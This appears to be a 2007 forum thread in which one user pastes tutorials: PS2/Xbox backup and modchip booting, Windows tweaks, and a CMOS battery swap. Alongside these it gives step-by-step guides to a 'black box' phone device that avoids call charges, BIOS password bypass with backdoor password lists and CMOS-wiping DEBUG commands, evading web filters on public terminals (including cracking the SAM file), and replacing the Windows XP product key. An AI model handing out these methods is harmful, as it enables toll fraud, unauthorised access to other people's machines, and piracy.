Okay, these are some methods to backup PS2 titles and Xbox titles, in order to play a backup you need a modchip of some sort, I have also included a tutorial on boot methods. Follow any one of these instructions to fit your needs. You can tell what format the PS2 title is by looking at the written side of the disc, DVD's are Silver and CD's are Purple. The DVD backup methods here consist of reading the image to the hard drive then burning it to the media for an easier backup, this depends on your hardware and it?s setup. I say that because the proper setup would be to have the Reader and Writer on separate IDE cables. This allows no cross information when doing Disc to Disc/On the fly copying. But, since most people would not know how to check or fix this, I suggest reading the image to your Hard Drive and then burning from there. *A little useful trick*, If the DVD backup "image" is small enough in size you can fit it onto a CD-R (80 minute or larger if need be) instead of using a more expensive DVD-R. I have done this succesfully using Prassi and the first tutorial for it below. In addition a DVD Movie backup will play on a PS2/Xbox without a chip. As I get more info I will update. Dexter


PS1/PS2 CD backup tutorials


Using CloneCD (v4.x.xx) for PS1/PS2

1. Start CloneCD
2. Select "Copy CD"
3. Select your Reader, press Next
4. Select "Game CD", press Next
5. Select/Deselect your options here (on the fly, cue or delete) then press Next
6. Select your Writer, press Next
7. Select your burn speed and "Game CD"
8. Press "OK" to begin


Using Alcohol 120% for PS1/PS2

1. Start Alcohol 120%
2. Select ?Copy Wizard?
3. Select your Reader & Read Speed
4. Select or Deselect ?Copy current disc on the fly?
5. For Datatype select which console PS1 or PS2, press Next
6. Select your Image location and Name for it, press Next
7. Select you Writer, Write Speed and anything else you feel you might need
8. Make sure the Datatype selected is the same you chose above
9. Press Start to begin


PS2 DVD backup tutorials


Using Prassi

1. Start Primo
2. Select "go to full application"
3. Right Click the drive that has your original in it
4. Select "build global image" and choose a path for the image (preferably on an NTFS opsys)
5. After the image is extracted go to next step
6. Choose the 3rd disc icon from the left *or* click file, new job, Global/Other Image
7. Then just burn the .gi (global image) of the game


This next way has one less step which saves some time because once you press record it does everything by itself (if you have a DVD reader and DVD Writer)

1. Start Primo
2. Use the "PrimoDVD Starter" (it's easier, and less confusing)
3. Choose "disc copy"
4. Select your Reader and Also your Writer
5. Select "make a temp image on HD..."
6. Select your burn speed and then record to begin


Using Nero

1. Start Nero, Use the Wizard (for easy use)
2. Select "DVD" then select Next
3. Select "Copy a DVD" then select Next
4. Select your source drive
5. Check OFF "copy on the fly" then select next
6. Select your write speed
7. Select either "Test", "Test and Burn" or "Burn"
8. Press "Burn" to begin

This next way is without the Wizard

1. Start Nero, and select "File" then "New..."
2. On upper left side of the window from the drop down menu select "DVD"
3. Select "DVD Copy" Icon
4. Select "Copy options" tab
5. Check OFF "copy on the fly"
6. Select source drive and read speed
7. If needed Select "Image" tab to choose image directory and select/deselect "delete image..."
8. Select "Burn" tab and choose your settings
9. Press "Copy" to begin


Using Alcohol 120%

1. Start Alcohol 120%
2. Select ?Copy Wizard?
3. Select your Reader
4. For ?Separate Image file every:? choose ?Never Separate?
5. Select or Deselect ?Copy current disc on the fly?, press Next
6. Select your Image location and Name for it, press Next
7. Select you Writer, Write Speed and anything else you feel you might need
8. Select or Deselect ?Delete image file after recording?
9. Press Start to begin


XBOX backup tutorials


Xbox original games are burned from the outside in. The only way to backup a title is to have a modchip like X-exuter (best), Enigma, or Xodus/Matrix. You also have to flash the bios and have a CD program inserted or installed into the X-Box named EVO-X (this allows you to assign the X-Box an IP address). The game has to be stored on the X-Box's HD, this allows you to file transfer the title to your PC using an ftp program like FlaxhFXP (best) or similar. From there you use a burning application to make the backup. Some applications allows you to "drag & drop" right from the Xbox or you can build an ISO of the image then burn to CD-R/W or DVD-R/W backup. (I will update this to show steps as soon as I have a minute)


Modded PS2 with or without Action Replay/GameShark CD & DVD backup booting methods

PS2 with NeoKey/Sbox & AR/GS, PS1 CD backup booting

1. Turn on PS2 and NeoKey/Sbox
2. Press Eject
3. Insert PS1 CD backup
4. Press reset
5. PS2 tray will close
6. PS1 CD backup will now boot


PS2 with NeoKey/Sbox & AR/GS, PS2 CD backup booting

1. Have AR/GS dongle in a memory card slot
2. Power on your PS2
3. Insert AR/GS disc
4. At the AR/GS menu, select Start Game, With/Without codes
5. Eject and swap to your PS2 CD backup and press X.
6. Screen will change and game will now boot

* Note - Neokey will not play DVD-R!
* Note - Old versions of AR2/GS2 you might need to press R1+O instead of X to boot games


PS2 with Neo 2.2, PS1 CD backup booting

1. Turn on PS2
2. Press Eject
3. Insert PS1 CD backup
4. Press reset
5. PS2 tray will close
6. PS1 CD backup will now boot


PS2 with Neo 2.2 & AR/GS, PS2 CD backup booting

1. Have AR/GS dongle in a memory card slot
2. Power on your PS2
3. Insert AR/GS disc
4. At the AR/GS menu, select Start Game, With/Without codes
5. Eject and swap to your PS2 CD backup and press X.
6. Screen will change and game will now boot


PS2 with Neo 2.2 & AR/GS, PS2 DVD backup booting

1. Have AR/GS dongle in a memory card slot
2. Power on your PS2
3. Insert AR/GS disc, close tray
4. Power off your PS2, wait a few seconds
5. Press and Hold Reset button to load AR/GS
6. At the AR2/GS2 menu, press EJECT while still holding Reset
7. Swap AR/GS disc for an Original-TOC-DVD* and wait 10 seconds
8. Select "AR/GS Codes"
9. Highlight "Add new code" and press X to get to the next screen
10. Press X three times. You will see "Updating code list please wait" each time)
11. Press "Start" on controller
12. Select "Without codes", press X
13. Then Press X again, and immediately release the Reset button, you will see "Updating code list please wait"
14. The PS2 tray will eject allowing you to swap Original-TOC-DVD* for DVD backup and then close on it?s own
15. Screen will change and game will now boot

* Note - "Original-TOC-DVD" is an original DVD that is a larger file size than the backup
* Note ? For a shortcut make a few ?Add new codes? and after step 8 just highlight one of them and press square to delete it, then proceed on with step 11

PS2 with Messiah

1. PSX Backups will boot directly.
2. PS2 CD-R Backups will boot directly.
3. PS2 Unpatched EA backups will boot directly.
4. PS2 DVD-R Backups will boot directly.


PS2 with Magic 2, 3 or 3.5

1. PSX Backups will boot directly.
2. PS2 CD-R Backups will boot directly.
3. PS2 Unpatched EA backups will boot directly.
4. PS2 DVD-R Backups will boot directly.


Ps2 with Apple Mod

1. PSX Backups will boot directly.
2. PS2 CD-R Backups will boot directly.
3. PS2 Unpatched EA backups will boot directly.
4. PS2 DVD-R Backups will boot directly.[CODE]

Master
30-04-07, 04:43
Some people seem to think our network is a kind of a store a they just pick what they want without sharing anything!
(and other considere our net as a schoolyard where one "trade"... Childish!)

*********************

You can help everybody getting rid of them by boycotting them that way:

You "browse" each uploading user.


** If he/she shares more than, say, a hundred files (and NOT in the WinMx directory only, putting them elsewhere and unshared when entirely downloaded !!!), OK.
NB: a hundred is not a lot but 1- we don't all have a large HDD and some files are big 2- when you begin...!
** If not:

You can send a message to him/her to ask why there is no real share, or not at all, for they can have forgotten to do so: give them a chance! The first time, I didn't understand that I had to choose the shared files types, so I shared nothing, unwillingly. Somebody told it to me in a message.

If no answer and/or still no shared file, you can exclude the selfish beast:
(Thanks to dwhite who gave the modus operandi on the WinMx net)

To block somebody from downloading, add the name to your HOTLIST (right-click the name then "Add to hotlist") then to your IGNORE list.

You won't receive any messages nor will they enter your queue, during that session at least.

********************

On the contrary, you can help people who share a lot by starting the tranfer when they are in your queue, or give a higher bandwith priority...

Master
30-04-07, 04:44
How To Block Websties Without Software, block websites

Steps:

1] Browse C:\WINDOWS\system32\drivers\etc
2] Find the file named "HOSTS"
3] Open it in notepad
4] Under "127.0.0.1 localhost" Add 127.0.0.2 Only the registered members can see the link , and that site will no longer be accessable.
5] Done!

-So-

127.0.0.1 localhost
127.0.0.2 Only the registered members can see the link

-->Only the registered members can see the link is now unaccessable<--


For every site after that you want to add, just add "1" to the last number in the internal ip (127.0.0.2) and then the addy like before.

IE: 127.0.0.3 Only the registered members can see the link
127.0.0.4 Only the registered members can see the link
127.0.0.5 Only the registered members can see the link

etc

Master
30-04-07, 04:44
First of all, this tweak only apply to those who only have one HDD on their primary IDE channel (nothing else on device 0 or 1) and a CD-ROM and/or DVD-ROM on the secondary IDE channel. Each time you boot Windows XP, there's an updated file called NTOSBOOT-*.pf who appears in your prefetch directory (%SystemRoot%Prefetch) and there's no need to erease any other files as the new prefetch option in XP really improves loading time of installed programs. We only want WindowsXP to boot faster and not decrease its performance. Thanks to Rod Cahoon (for the prefetch automation process...with a minor change of mine) and Zeb for the IDE Channel tweak as those two tricks, coupled together with a little modification, result in an EXTREMELY fast bootup:

1. Open notepad.exe, type "del c:windowsprefetch tosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device 0 or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

WindowsXP should now boot REALLY faster.

Master
30-04-07, 04:45
How to build a black box?

I found this tutorial quite a long time ago and I don't know if it still works. Nevertheless , it might be interresting to read, you might even learn something from it! I would have gladly given credit to it's author but won't since I have no idea who he is. So here is his tutorial that remained unchanged ( I hope!):

A BLACK BOX
is a device that is hooked up to your phone that fixes your phone so that when you get a call, the caller doesn't get charged for the call. This is good for calls up to 1/2 hour, after 1/2 hour the phone Co. gets suspicious, and then you can guess what happens.

What this little beauty does is keep the line voltage from dropping to 10v when you answer your fone. The line is instead kept at 36v and it will make the fone think that it is still ringing while your talking. The reason for the 1/2 hour time limit is that the
phone CO. thinks that something is wrong after 1/2 an hour of ringing.

All parts are available at Radio Shack. Using the least possible parts and arangement, the cost is $0.98 !!!! And that is parts for two of them! Talk about a deal! If you want to splurge then you can get a small PC board, and a switch. There are two
schematics for this box, one is for most normal fones. The second one is
for fones that don't work with the first. It was made for use with a Bell
Trimline touch tone fone.

** Schematic 1 for most fones **
** LED ON: BOX ON **

FROM >--------------------GREEN-> TO
LINE >--! 1.8k LED !---RED--> FONE
!--///--!>--!
! !
------>/<-------
SPST



Parts: 1 1.8k 1/2 watt resistor
1 1.5v LED
1 SPST switch

You may just have two wires which you connect together for the switch.


** Schematic 2 for all fones **
** LED ON: BOX OFF **

FROM >---------------GREEN-> TO
LINE >------- ---RED--> FONE
! LED !
-->/<--!>--
! !
---///---
1.8k
�Parts: 1 2 watt resistor
1 1.5v LED
1 DPST switch


Here is the PC board layout that I recommend using. It is neat and is very easy to hook up.

Schematic #1 Schematic #2

************** ****************
* * * ------- *
* --<LED>--- * * ! ! *
* ! ! * * ! <SWITCH> *
* RESISTOR ! * * ! ! ! *
* ! ! * * ! ! / *
* -------- ! * * ! ! *
* ! ! * * ! <LED>! / *
* --SWITCH-- * * ! ! *
* ! ! * * ! ! / *
L * ! ! * F L * ! ! ! * F
I>RED- -RED>O I>RED- ---RED>O
N>-----GREEN---->N N>-----GREEN------>N
E * h * E E * * E
************** ****************

Once you have hooked up all the parts, you must figure out what set of wires go to the line and which go to the fone. This is because of the fact that LED's must be put in, in a certain direction. Depending on which way you put the LED is what controls what wires are for the line & fone.

How to find out:

Hook up the box in one direction using one set offor line and the other for fone.

*NOTE* For Model I switch should be OFF.
*NOTE* For Model ][ switch should be set to side connecting the led.

Once you have hooked it up, then pick up the fone and see if the LED is on. If it is, the LED will be lit. If is doesn't light then switch the wires and try again. Once you know which are which then label them. *NOTE* - If neither directions worked then your
�lable the switch in its current position as BOX ON.

How to use it:

The purpose of this box is for poeple who call you not to pay so it would make
sence that it can only be used to receive! calls. When the box is *ON* then you may only recieve calls. Your fone will ring like normal and the LED on the box will flash. If you answer the fone now, then the LED will light and the caller will not be charged. Hang up the fone after you are done talking like normal. You will not be able to get a dial-tone or call when the box is on, so turn the box *OFF* for normal calls. I don't recommend that you leave it on all the time, as you don't want it to answer when Ma Bell calls!

Hope it brought something to those who read it.

XIII
numberXIII@Phreaker.net

Master
30-04-07, 04:45
windows xp has burning software built in which can cause problems sometimes when burning with other programs.

you can turn windows xp burning tool off like this.


Go to "administrative tools" in the control panel.

In the "services" list, disable the IMAPI CD-Burning COM service.

Master
30-04-07, 04:47
How to Bypass BIOS Passwords

BIOS passwords can add an extra layer of security for desktop and laptop computers. They are used to either prevent a user from changing the BIOS settings or to prevent the PC from booting without a password. Unfortunately, BIOS passwords can also be a liability if a user forgets their password, or changes the password to intentionally lock out the corporate IT department. Sending the unit back to the manufacturer to have the BIOS reset can be expensive and is usually not covered in the warranty. Never fear, all is not lost. There are a few known backdoors and other tricks of the trade that can be used to bypass or reset the BIOS

DISCLAIMER
This article is intended for IT Professionals and systems administrators with experience servicing computer hardware. It is not intended for home users, hackers, or computer thieves attempting to crack the password on a stolen PC. Please do not attempt any of these procedures if you are unfamiliar with computer hardware, and please use this information responsibly. LabMice.net is not responsible for the use or misuse of this material, including loss of data, damage to hardware, or personal injury.


Before attempting to bypass the BIOS password on a computer, please take a minute to contact the hardware manufacturer support staff directly and ask for their recommended methods of bypassing the BIOS security. In the event the manufacturer cannot (or will not) help you, there are a number of methods that can be used to bypass or reset the BIOS password yourself. They include:

Using a manufacturers backdoor password to access the BIOS

Use password cracking software

Reset the CMOS using the jumpers or solder beads.

Removing the CMOS battery for at least 10 minutes

Overloading the keyboard buffer

Using a professional service

Please remember that most BIOS passwords do not protect the hard drive, so if you need to recover the data, simply remove the hard drive and install it in an identical system, or configure it as a slave drive in an existing system. The exception to this are laptops, especially IBM Thinkpads, which silently lock the hard drive if the supervisor password is enabled. If the supervisor password is reset without resetting the and hard drive as well, you will be unable to access the data on the drive.


--------------------------------------------------------------------------------

Backdoor passwords

Many BIOS manufacturers have provided backdoor passwords that can be used to access the BIOS setup in the event you have lost your password. These passwords are case sensitive, so you may wish to try a variety of combinations. Keep in mind that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards. Laptops typically have better BIOS security than desktop systems, and we are not aware of any backdoor passwords that will work with name brand laptops.

WARNING: Some BIOS configurations will lock you out of the system completely if you type in an incorrect password more than 3 times. Read your manufacturers documentation for the BIOS setting before you begin typing in passwords

Award BIOS backdoor passwords:

ALFAROME ALLy aLLy aLLY ALLY aPAf _award AWARD_SW AWARD?SW AWARD SW AWARD PW AWKWARD awkward BIOSTAR CONCAT CONDO Condo d8on djonet HLT J64 J256 J262 j332 j322 KDD Lkwpeter LKWPETER PINT pint SER SKY_FOX SYXZ syxz shift + syxz TTPTHA ZAAADA ZBAAACA ZJAAADC 01322222
589589 589721 595595 598598

AMI BIOS backdoor passwords:

AMI AAAMMMIII BIOS PASSWORD HEWITT RAND AMI?SW AMI_SW LKWPETER A.M.I. CONDO

PHOENIX BIOS backdoor passwords:

phoenix, PHOENIX, CMOS, BIOS

MISC. COMMON PASSWORDS

ALFAROME BIOSTAR biostar biosstar CMOS cmos LKWPETER lkwpeter setup SETUP Syxz Wodj

OTHER BIOS PASSWORDS BY MANUFACTURER

Manufacturer Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
TMC BIGO
Toshiba Toshiba

TOSHIBA BIOS

Most Toshiba laptops and some desktop systems will bypass the BIOS password if the left shift key is held down during boot

IBM APTIVA BIOS

Press both mouse buttons repeatedly during the boot


--------------------------------------------------------------------------------

Password cracking software

The following software can be used to either crack or reset the BIOS on many chipsets. If your PC is locked with a BIOS administrator password that will not allow access to the floppy drive, these utilities may not work. Also, since these utilities do not come from the manufacturer, use them cautiously and at your own risk.

Cmos password recovery tools 3.1
!BIOS (get the how-to article)
RemPass
KILLCMOS

--------------------------------------------------------------------------------

Using the Motherboard "Clear CMOS" Jumper or Dipswitch settings

Many motherboards feature a set of jumpers or dipswitches that will clear the CMOS and wipe all of the custom settings including BIOS passwords. The locations of these jumpers / dipswitches will vary depending on the motherboard manufacturer and ideally you should always refer to the motherboard or computer manufacturers documentation. If the documentation is unavailable, the jumpers/dipswitches can sometimes be found along the edge of the motherboard, next to the CMOS battery, or near the processor. Some manufacturers may label the jumper / dipswitch CLEAR - CLEAR CMOS - CLR - CLRPWD - PASSWD - PASSWORD - PWD. On laptop computers, the dipswitches are usually found under the keyboard or within a compartment at the bottom of the laptop.
Please remember to unplug your PC and use a grounding strip before reaching into your PC and touching the motherboard. Once you locate and rest the jumper switches, turn the computer on and check if the password has been cleared. If it has, turn the computer off and return the jumpers or dipswitches to its original position.


--------------------------------------------------------------------------------

Removing the CMOS Battery

The CMOS settings on most systems are buffered by a small battery that is attached to the motherboard. (It looks like a small watch battery). If you unplug the PC and remove the battery for 10-15 minutes, the CMOS may reset itself and the password should be blank. (Along with any other machine specific settings, so be sure you are familiar with manually reconfiguring the BIOS settings before you do this.) Some manufacturers backup the power to the CMOS chipset by using a capacitor, so if your first attempt fails, leave the battery out (with the system unplugged) for at least 24 hours. Some batteries are actually soldered onto the motherboard making this task more difficult. Unsoldering the battery incorrectly may damage your motherboard and other components, so please don't attempt this if you are inexperienced. Another option may be to remove the CMOS chip from the motherboard for a period of time.
Note: Removing the battery to reset the CMOS will not work for all PC's, and almost all of the newer laptops store their BIOS passwords in a manner which does not require continuous power, so removing the CMOS battery may not work at all. IBM Thinkpad laptops lock the hard drive as well as the BIOS when the supervisor password is set. If you reset the BIOS password, but cannot reset the hard drive password, you may not be able to access the drive and it will remain locked, even if you place it in a new laptop. IBM Thinkpads have special jumper switches on the motherboard, and these should be used to reset the system.


--------------------------------------------------------------------------------

Overloading the KeyBoard Buffer

On some older computer systems, you can force the CMOS to enter its setup screen on boot by overloading the keyboard buffer. This can be done by booting with the keyboard or mouse unattached to the systems, or on some systems by hitting the ESC key over 100 times in rapid succession.


--------------------------------------------------------------------------------

Jumping the Solder Beads on the CMOS

It is also possible to reset the CMOS by connecting or "jumping" specific solder beads on the chipset. There are too many chipsets to do a breakdown of which points to jump on individual chipsets, and the location of these solder beads can vary by manufacturer, so please check your computer and motherboard documentation for details. This technique is not recommended for the inexperienced and should be only be used as a "last ditch" effort.


--------------------------------------------------------------------------------

Using a professional service

If the manufacturer of the laptop or desktop PC can't or won't reset the BIOS password, you still have the option of using a professional service. Password Crackers, Inc., offers a variety of services for desktop and laptop computers for between $100 and $400. For most of these services, you'll need to provide some type of legitimate proof of ownership. This may be difficult if you've acquired the computer second hand or from an online auction.

By Master
Gmail : Master.huricane@gmail.com

Master
30-04-07, 04:47
How to bypass web filters



There are several occasions where you will be at a public te How to bypass web filters
rminal, and require access to a particular website that is blocked for some reason or another. How to bypass these restrictions is a very common question, and will be covered here.

Lets pretend for a moment that the Internet is made up of 26 websites, A-Z. The web filter blocks your browser from accessing sites X-Z, but not sites A-W. Simply make the browser think you’re going to A-
W. There are a variety of ways to do this:


Proxy Servers:
This is a list of http proxies. These sites may not be up forever, so you may need to search for “free http proxy” or “public proxy servers” or other similar terms.

Proxy server lists:
• Only the registered members can see the link
• Only the registered members can see the link
• Only the registered members can see the link
• Only the registered members can see the link
• Only the registered members can see the link
• Only the registered members can see the link
• Only the registered members can see the link

Now that you have a list of proxies, you would open IE (internet explorer) and click on Tools > Internet Options > Connections > LAN Settings > Advanced. Enter the address and port of one of the servers from the list in the proper area (http) and make sure the “use a proxy server for your LAN” option is selected. Remember to replace the proxy and port at your terminal to the original when you're done.

*Note: Some proxies listed may not work, and this method may decrease your surfing speed. By trying various entries, you’ll find one that works, or works faster.

The infamous translation trick:
Go to a web page translation site and use their services to “translate a page to English” thus accessing the blocked page through their trusted site.

You’ll notice that several translation sites are blocked, but by using less popular ones, this method can still be effective. Here is a list of some translation services. Again, these sites may not be up forever, so you may need to search for them.

• Only the registered members can see the link
• Only the registered members can see the link
• Only the registered members can see the link
• Only the registered members can see the link

Url Scripting:



Url scripting is the easiest method. It works on a select few web filters and is based on the same principal as the translation trick. By typing and address like “Only the registered members can see the link@Only the registered members can see the link the filter will not go into effect as it recognizes the trusted site (in this case yahoo.com)

Other tricks:
Simply open the command prompt and type:
Ping restricted.com ? restricted.com obviously being the restricted site
At this point you can take down the IP address (ex. 216.109.124.73) and enter it into the browser. If access to the command prompt is also restricted, see “How to bypass restrictions to get to the command prompt.” If this article has been taken from information leak, then know that it involves anything from opening the browser, selecting view > source, then saving it as X.bat and opening it to opening a folder or browser and typing in the location of cmd.exe depending on the OS. I will not go into further, as this a completely different topic.

Use Only the registered members can see the link as referring to it as a secured site may confuse the filter.

Note: These are ancient methods that many new filters defend against, but still may be applicable in your situation. If not, a little history never hurt anyone.

Web based Proxies:
Another one of the easier, yet effective methods include web based proxies. These are simple in the fact that you just enter the restricted address and surf! Some of these have some restrictions, like daily usage limits, etc but you can also use another proxy (perhaps one that sucks, like a text only) to bypass their restrictions as well. Here is a list of some:

• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link

Proxy Programs:
There are many proxy programs that allow you to surf anonymously that are more or less based on the same topics we’ve covered here. I’ve added them just to cover the topic thoroughly:

• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link ? toolbar that requires admin rights to install

Making your own CGI proxy server:

Making your own proxy server may come in handy, but I personally find that simply uploading a txt file/w a list of proxies to a free host makes for a much easier and headache free solution. If you don’t know PERL, there is code out there to help you set it up. Check out these sites for more info:

• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link
• Only the registered members can see the link]Only the registered members can see the link



Admin Access:
When all else fails, you can simply take over the PC and alter or delete the damn filter. This method varies according to the OS (operating system) you are dealing with. Please see “Hacking Windows NT” for more information. If this tutorial has been taken from information leak, then I will go as far as to say it involves booting the PC in another OS, copying the SAM file and cracking it using a program like saminside or LC5 rather than start a whole new topic within one.

Master
30-04-07, 04:48
HOW TO CAPTURE STREAMING MEDIA

many websites (Only the registered members can see the link) stream songs and videos
people believe they cannot be downloaded, quite why i dont know. they kinda think there is no file present to dwnld

once the file is located it can then be retrieved by nettransport
nettransport is able to dwnld any file whether ftp or rtsp etc

1. Download Project URL Snooper 1.02.01 from Only the registered members can see the link
2. Install URL Snooper (and WinPcap together)
3. Don't run URL Snooper when it is done installing
4. Restart computer
5. Open Project URL Snooper
6. Click on the General Options Tab
7. user posted image
8. Chose a network adapter
9. Now click on the search tab
10. Click Sniff Network
11. Go to a webpage and you should see some results in the results list
12. If nothing is appearing then chose another network adapter, until one works

13. Now you are ready to begin searching
14. Click the "Hide Non-Streaming URLs" option to hide all Only the registered members can see the link references and only show URLs corresponding to streaming audio/video (rtsp, pnm, wma, etc.)
15. Then click Sniff Network
16. Your links should appear as you begin streaming your file
17. Select your desired stream user posted image
18. usually rm file user posted image
19. On the bottom there should be the link which you simply copy user posted image

20. Download nettransport from here ftp://down_transport:123@s1.5fox.com/NT2Setup_multi.EXE or
ftp://nettransport:nettransport@61.153.24...Setup_multi. EXE
Only the registered members can see the link

21. Install it
22. Click on new
23. Paste link

now you should be able to download any file
if u need ne help
jus ask
i think dialups may have problems

Master
30-04-07, 04:48
First the safety rules

The inside of a computer is a bad place full of electricity and sharp edges.
On the electricity side always when working on you computer make sure that it’s still plugged in to the power socket and the power is turned off, this is to ensure that any static
From you is discharged through the earth. The inside of most computer cases are unfinished metal and has very sharp edges so be careful.

The first signs of a battery failing are:-

1) your clock starts running slowly
2) when you boot (start) your computer it has a problem finding your hardware (no hard drive, no cd rom)

To change the battery you need the following tools

1) a X-point screwdriver
2) an anti-static strap(optional)
3) a new battery (seems logical)

Then unplug all the cables from the back of the computer as you remove them make a note where they came from. (So when you finished you can put them back)

Move the computer somewhere where you can work on it with ease

Remove the cover by locating the screws around the outer edge (back) of the computer
Some computer cases only require you to remove 2 screws on one side then a panel can be removed allowing you access to the computers insides, others you must remove 6 screws and remove the whole case by sliding it to the rear and lifting it off.

Now make sure that you read the safety instructions about static.
Look inside you will see a round silver thing that looks about the size of a 10p piece (quarter). This is the battery itself, carefully lift the retaining clip and slide the battery out. That’s it removed now go to your local computer retailer, electrical retailer (Tandy/Radio shack) taking the old battery with you and get a new battery.

Back to your computer insert the new battery by lifting the clip and sliding the battery in.

Reinstall your case and plug all the cables back (you did remember to label them didn’t you)

Now for the fun part.

You will now need to go into you bios….

Right the bios is the god of your computer.

To access it, when your computer first starts you will see a black screen with white text.

If you look carefully you will see a line that says something like "press del for setup" or some other key (F2 or ESC or tab) this will take you to god's house where you can make lots of changes to the way your machine works.

It is also the place where you can make your nice computer in to a rather expensive door stop so be careful and don’t go playing with anything.

You will now be presented with a blue screen with a lot of options on it,
The one we want is load optimised/default settings.

Press the F10 key and type y the computer should now reboot.

If every thing went well then your computer will now be up and running.



Shizers way: Keep computer running. Lay it on it's side and remove side cover to expose MoBo. Take any thin object, "small screwdriver, knife point, wood shiskabob skewer. Pull back the battery retaining clip. Toss the old battery in the junk recepticle, unless you belong to greenpeace and want to save the earth. Install the new battery. No need to reset bios becasue the compter supplies voltage to the cmos while it is running. Reset or resync clock with internet. Done!

Master
30-04-07, 04:49
Step 1

Open Start/Run... and type the command:
regedit and click "OK" (or press ENTER).

Go to HKey_Local_Machine\Software\Microsoft\WindowsNT\Cu rrent Version\WPAEvents,
on the right double click on "oobetimer" and change at least one digit of this value to deactivate windows.

Click "OK" and close the Registry Editor.

Step 2

Open Start/Run... and type the command:
%systemroot%\system32\oobe\msoobe.exe /a and click "OK" (or press ENTER).

This will bring up the "Activate Windows" window.

Check the option for "Yes, I want to telephone a customer service representative to activate Windows" and click "Next"


Step 3

Then click "Change Product Key" (don't enter any information on that screen)


Step 4

Type in the new key and click "Update"


The activate Windows by phone window will reappear at this point, just close it by clicking the X in the upper right hand corner

Step 5

Reboot your system and Open Start/Run... and type the command:
%systemroot%\system32\oobe\msoobe.exe /a and click "OK" (or press ENTER).

If you see "Windows is already activated" then everything is OK.

Master
30-04-07, 04:49
If any of you out there like to use the thumbnail view, especially for browsing through photos and images, it can become a bit of a drain on your system. It is possible to lower the thumbnail size and quality by editing the following registry keys.

Open the registry and navigate to :

HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer

Create a new DWORD value called ThumbnailSize, and set the value between 32 and 256.

And/or create another DWORD value called ThumbnailQuality, and set the value between 50 and 100.

Key Details :

USER Key: [HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer]
Value Name: ThumbnailSize
Data Type: REG_DWORD (DWORD Value)
Data Value: 32 - 256

USER Key: [HKEY_CURRENT_USER\ Software\ Microsoft \ Windows\ CurrentVersion\ Explorer]
Value Name: ThumbnailQuality
Data Type: REG_DWORD (DWORD Value)
Data Value: 50 - 100

Master
30-04-07, 04:50
How to clear Bios info

READ EVEYTHING BEFORE YOU USE ANY METHOD LISTED BELOW

Basic BIOS password crack - works 9.9 times out of ten
This is a password hack but it clears the BIOS such that the next time you start the PC, the CMOS does not ask for any password. Now if you are able to bring the DOS prompt up, then you will be able to change the BIOS setting to the default. To clear the CMOS do the following:
Get DOS prompt and type:
DEBUG hit enter
-o 70 2e hit enter
-o 71 ff hit enter
-q hit enter
exit hit enter
Restart the computer. It works on most versions of the AWARD BIOS.



Accessing information on the hard disk
When you turn on the host machine, enter the CMOS setup menu (usually you have to press F2, or DEL, or CTRL+ALT+S during the boot sequence) and go to STANDARD CMOS SETUP, and set the channel to which you have put the hard disk as TYPE=Auto, MODE=AUTO, then SAVE & EXIT SETUP. Now you have access to the hard disk.

Standard BIOS backdoor passwords
The first, less invasive, attempt to bypass a BIOS password is to try on of these standard manufacturer's backdoor passwords:
AWARD BIOS
AWARD SW, AWARD_SW, Award SW, AWARD PW, _award, awkward, J64, j256, j262, j332, j322, 01322222, 589589, 589721, 595595, 598598, HLT, SER, SKY_FOX, aLLy, aLLY, Condo, CONCAT, TTPTHA, aPAf, HLT, KDD, ZBAAACA, ZAAADA, ZJAAADC, djonet, %����� �p������%, %������ �p������%
AMI BIOS
AMI, A.M.I., AMI SW, AMI_SW, BIOS, PASSWORD, HEWITT RAND, Oder
Other passwords you may try (for AMI/AWARD or other BIOSes)
LKWPETER, lkwpeter, BIOSTAR, biostar, BIOSSTAR, biosstar, ALFAROME, Syxz, Wodj
Note that the key associated to "_" in the US keyboard corresponds to "?" in some European keyboards (such as Italian and German ones), so -- for example -- you should type AWARD?SW when using those keyboards. Also remember that passwords are Case Sensitive. The last two passwords in the AWARD BIOS list are in Russian.

Flashing BIOS via software
If you have access to the computer when it's turned on, you could try one of those programs that remove the password from the BIOS, by invalidating its memory.
However, it might happen you don't have one of those programs when you have access to the computer, so you'd better learn how to do manually what they do. You can reset the BIOS to its default values using the MS-DOS tool DEBUG (type DEBUG at the command prompt. You'd better do it in pure MS-DOS mode, not from a MS-DOS shell window in Windows). Once you are in the debug environment enter the following commands:
AMI/AWARD BIOS
O 70 17
O 71 17
Q
PHOENIX BIOS
O 70 FF
O 71 17
Q
GENERIC
Invalidates CMOS RAM.
Should work on all AT motherboards
(XT motherboards don't have CMOS)
O 70 2E
O 71 FF
Q
Note that the first letter is a "O" not the number "0". The numbers which follow are two bytes in hex format.

Flashing BIOS via hardware
